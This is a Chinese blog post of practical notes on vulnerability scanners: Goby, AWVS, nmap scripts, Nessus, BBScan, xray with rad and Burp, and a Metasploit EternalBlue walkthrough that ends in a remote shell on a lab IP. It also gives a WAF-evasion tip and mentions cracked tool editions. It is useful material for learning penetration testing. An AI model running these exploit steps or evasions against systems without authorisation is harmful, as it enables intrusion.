当前位置: 首页 > news >正文

肝了三天三夜!最详尽的漏洞扫描工具实战笔记

Goby+AWVS 漏洞扫描

提示提示:

本文里面很多工具都是网址,还有站长之家之类的,csdn一直判断成暗链,可以去我自己博客查看完整全文:
多说一句:csdn对网安真的不友好,全文链接都不让放。。。》[好淘云]《

goby 和 AWVS 简介

Goby 是针对目标企业梳理最全面的工具,同构 goby 可以清晰的扫描出 ip 地址开放的端口,以及端口对应的服务,于此同时会根据开放的端口及应用进行实战化的测试,并不在乎他的中低危害漏洞,而更在乎的是它能直接 get shell 的漏洞

AWVS 是针对 web 的轻量级的漏洞扫描工具。也就是根据我们提供的被扫描地址,快速的扫描出其所有的漏洞,包含高中低及信息泄露等漏洞。

前戏

下载 goby 和 awvs(建议下载红队专版,更强大)goby 下载 awvs 的插件 将 awvs 的 api 添加到 goby 中 下载 npcap

红队专版 goby 下载链接:
(麻烦看下文章开头)

在 goby 中输入 ip 或者域名开始扫描

一般是直接将子域名爆破出来,直接全部加进去

扫描结束后点击右边【Web 检测】

左侧漏洞直接查看 goby 扫描出来的漏洞

其实一般这个就够用了

点击 awvs 按钮

awvs 页面看到正在扫描

goby 页面生成模板

awvs 绕过 waf

可以通过修改扫描速度和修改 user-agent 头来绕过 waf

nmap

需要常更新 namp:

windows:

kali:执行命令 sudo apt-get install nmap

下载 vulscan

windows:

linux:

ln -spwd/scipag_vulscan /usr/share/nmap/scripts/vulscan

也可以之间下到 windows 中然后转移到 kali 里面 /usr/share/nmap/scripts/ 里面

更新漏洞库:

将下列文件下载下来放进 /vulscan/ 文件夹中

看文章开头搜索原文。。。

下载 nmap-vulners

windows:

访问(文章开头查看原文),下载并放进 nmap\scripts\nmap-vulners*

linux:

cd /usr/share/nmap/scripts/

git clone https://github.com/vulnersCom/nmap-vulners.git

也可以之间下到 windows 中然后转移到 kali 里面 /usr/share/nmap/scripts/ 里面

运行使用

使用 vulscan 扫描(推荐):nmap -sV --script=vulscan/vulscan.nse 192.168.242.137

(好像 windows 更多)

使用 nmap-vulners 扫描:nmap -sV --script=nmap-vulners/vulners.nse 192.168.242.137

Nessus

下载参考链接:

windows:(找了将近四天,感觉最好的了)

主要为以下三步

记一个遇到的问题:浏览器打不开

解决方法:调整键盘为英文输入状态,点击页面内的刷新按钮,刷新一下页面,然后用鼠标点击一下当前页面任意位置,紧接着在当前页面使用键盘直接输入:thisisunsafe 即可(不是在地址栏输入,就直接敲键盘就行了)。

使用:

New Scan

Basic Network Scan

Basic Network Scan 为简易的扫描,一般用这个就够了。

Advanced Scan 为在不使用任何建议的情况下配置扫描。

配置基础信息 settings

配置账号密码

如果网站有账号密码,需要配置 Credentials

选择插件 plugins

保存 save

点击 ”>” 进行扫描

BBScan

先通过 GitHub 下载 BBScan2

安装库:pip install -r requirements.txt

扫描单个目标:python BBScan.py --host [url]

从文件导入目标:python BBScan.py -f urls.txt

参数:

Targets:--host[HOST[HOST...]]Scan several hosts fromcommandline-fTargetFile Load new line delimited targets from TargetFile-dTargetDirectory Load all *.txt files from TargetDirectory--crawlerCrawlDirectory Load all *.log crawl files from CrawlDirectory--networkMASK Scan all Target/MASK neighbour hosts, should be an integer between8and31HTTP SCAN:--rule[RuleFileName[RuleFileName...]]Import specified rule files only. -n, --no-crawl No crawling, sub folders will not be processed -nn, --no-check404 No HTTP404existence check--fullProcess all sub directories Scripts SCAN: --scripts-only Scan with user scripts only--script[ScriptName[ScriptName...]]Execute specified scripts only --no-scripts Disable all scripts CONCURRENT:-pPROCESS Num of processes running concurrently,30by default-tTHREADS Num of scan threadsforeach scan process,3by default OTHER:--proxyProxy Set HTTP proxy server--timeoutTimeout Max scan minutesforeach target,10by default-mdSave scan report as markdownformat--save-ports PortsDataFile Saveopenports to PortsDataFile--debugShow verbose debug info -nnn, --no-browser Do notopenweb browser to view report-vshow program's version number andexit

xray

工具下载地址

所有工具:(不用百度限速云盘)

也可自行查找。(好像破解工具只能用于 xray1.3.3)

使用

下载下来,先双击 xray_windows_amd64.exe,然后 powershell 中运行.\xray_windows_amd64.exe genca 生成证书

双击证书进行配置

并配置代理,127.0.0.1:7777


windows 中使用时使用管理员模式运行 cmd,或者使用 powershell。


常用:

使用 HTTP 代理进行被动扫描:

xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output ming.html


其他:

使用基础爬虫漏洞扫描:

xray_windows_amd64.exe webscan --basic-crawler http://example.com --html-output xxx.html

快速测试单个 url, 无爬虫:

xray_windows_amd64.exe webscan --url http://example.com/?a=b --html-output single-url.html


其中:

未选择指定模块,xray 默认全部扫描,

–html 以 html:格式输出

ming.html:输出的网页

也可以直接用图形化页面:super-xray-1.7-system-jre

与 burp 联动

bp 配置:

在常规的抓包基础上,burp 再配置一个下游的代理。将流量抓发给 xray 进行扫描。

这里 bp 将流量抓发到本机的 7777 端口


重点!!!!

必须将 burp 中的“Set “Connection close”on incoming requests when using HTTP/1”取消勾选,要不然 burp 会自动修改 neaders 中的 connection 的内容


然后开启 xray 即可

与 rad 联动

附上一个 rad 下载地址:
(上面网盘里面也有)

rad 也为长亭科技开发的一款目录爬取工具,因为 xray 自动化爬取功能欠佳,所以结合 rad 可以更高效的自动爬取。注意,rad 只是爬取目标的目录,不爬取子域!!

(1)对单个域名监听:

先 xary 开启代理监听:

xray_windows_amd64.exe webscan –listen 127.0.0.1:7777 –html-output proxy.html

rad 对目标进行爬取:

rad_windows_amd64.exe -t http://example.com -http-proxy 127.0.0.1:7777

这样 rad 爬取的结果会自动转给 xray 进行扫描

(2)使用脚本对多个域名监听:

使用:python 1.py -r a.txt -o b.txt(- r 为域名,- o 为输出)

importargparseimporttimeparser=argparse.ArgumentParser()txtName=str(int(time.time()))+".txt"parser.add_argument('-r',help='Enter the file you want to generate')parser.add_argument('-o',type=str,default=txtName,help='Please enter the name of the file you want to output. Default is'+txtName)args=parser.parse_args()f=open(args.r,'r')data=f.readlines()a=""foriindata: a+="; .\\rad_windows_amd64.exe -t {} --json abs.json --index".format(i.strip())f.close()f=open(args.o,"w")f.write(a)f.close()

同理甚至可以 xray,rad 和 burp 三者联动,在这里我就不尝试了。

MSF(Metasploit Framework)

MSF 是一款 kali 自带漏洞利用及攻击程序,含有三大模块:

msfconsole:最常用的利用模块 msweb:是 MSF 的图形化接口 msfupdate:用于 MSF 的更新,建议使用前先更新

(以永恒之蓝为例):

运行:msfconsole

查找漏洞:search ms17-010

利用:use exploit/windows/smb/ms17_010_eternalblue

查看所需 payload:show options

设置 payload:set RHOSTS 192.168.242.137

开始攻击:run

反弹 shell:shell

浏览器直接搜索

如 CVE-2008-4250

查看漏洞公布平台

等等。。。

写在最后:
漏洞扫描工具只是我们渗透测试的第一步,工具是死的,人是活的。后续不管是进行内网渗透还是漏洞复现,一个稳定、安全的测试环境(如 VPS/ 云服务器)是必不可少的。

如果这篇文章对你有帮助,欢迎点赞收藏!有什么问题也可以在评论区交流。

http://www.jsqmd.com/news/705924/

相关文章:

  • AAEON PICO-V2K4:全球最小Ryzen V2000单板计算机解析
  • 2026最新亲测3款自动生成会议纪要免费神器,10分钟出稿好用到哭!
  • Visual C++运行库终极解决方案:一站式解决所有Windows应用程序依赖问题
  • 2026年Hermes Agent/OpenClaw怎么部署?保姆级教程分享
  • 阿里云服务器利用宝塔搭建个人博客网站
  • Python在TVA算法架构优化中的创新应用(九)
  • RAPID-LLM:大模型分布式训练性能优化实践
  • python signal
  • 2026年近期河北省护理专业择校指南:聚焦实力与升学 - 2026年企业推荐榜
  • 2026年Hermes Agent/OpenClaw如何部署?喂饭级教程
  • TorchTraceAP:PyTorch视觉模型性能优化新方案
  • 告别“唯大厂论”:全球财富 500 强实体企业 IT 核心岗位的隐形红利
  • 不花一分钱,10分钟搞定,2026销售录音总结怎么写每月省18小时多拿18成单率
  • 远程容器开发环境安全加固指南(含CVE-2023-XXXX漏洞规避方案与RBAC最小权限实践)
  • RAG 为什么一做多跳检索就开始证据链断裂:从 Query Decomposition 到 Path Reranking 的工程实战
  • AI Agent Harness Engineering 在软件开发中的应用:自动写代码、Debug 与测试的全流程闭环
  • AXI总线协议与ARM处理器集成架构详解
  • 4月27日成都地区H型钢(包钢、安泰、晋南,型号 HW、HM、‌HN、HT‌‌)现货批发 - 四川盛世钢联营销中心
  • 高效率的粉碎者:HPH高压均质机构造全拆解
  • MCP AI推理配置紧急升级通知:CVE-2024-MCP-08已曝,未配置memory_limit_policy的实例存在RCE风险
  • Spring AI实战指南:构建企业级AI应用的核心架构与最佳实践
  • Cherry MX键帽3D模型库:解决个性化键盘制造的标准化方案
  • Libre Computer AML-S905X-CC-V2开发板全面解析与应用指南
  • 2026年Hermes Agent/OpenClaw怎么部署?一键部署指南
  • Python在TVA算法架构优化中的创新应用(十)
  • 2026年4月更新:河北省口腔修复工艺专业择校指南,聚焦石家庄天使护校硬核实力 - 2026年企业推荐榜
  • Qwen-Agent智能体开发框架:从零构建多功能AI助手实战指南
  • 从怀疑到真香!2026我做课堂笔记只留这一款工具,亲测高效又省心
  • 【限时技术解禁】VS Code Copilot Next 自动化工作流配置密钥包(含3个私有Extension Hook + 2套CI/CD联动模板)
  • PikaScript:轻量级Python引擎在MCU上的实现与应用